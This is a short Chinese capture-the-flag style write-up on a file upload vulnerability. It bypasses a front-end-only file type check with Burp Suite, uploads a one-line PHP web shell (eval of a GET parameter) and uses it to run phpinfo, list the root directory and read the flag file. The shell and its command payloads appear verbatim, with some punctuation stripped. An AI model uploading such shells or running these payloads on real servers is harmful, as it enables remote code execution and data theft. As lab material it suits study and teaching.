文件上传漏洞这里上传文件我们可以打开检查可以看到该页面对上传文件做了相关的限定但是只是在前端页面进行了相关的验证后端不知道但是我们可以试试绕过前端的校验可以在设置中禁用javascript也可以进行burpsuite进行抓包这里使用抓包上传的文件木马为获取该服务器的cmd权限这里的校验为前端我们上传木马文件?php eval($_GET[cmd]);?木马文件需要后缀为jpg这里使用burpsuite抓包后修改后缀后在发送这里发送完成后就可以访问服务器了检查一下是否拥有权限核心代码?cmdphpinfo();权限拥有找到flag只需要查看该服务器的文件目录核心代码?cmdsystem(ls /);查看flag就好了?cmdsystem(cat /flag);
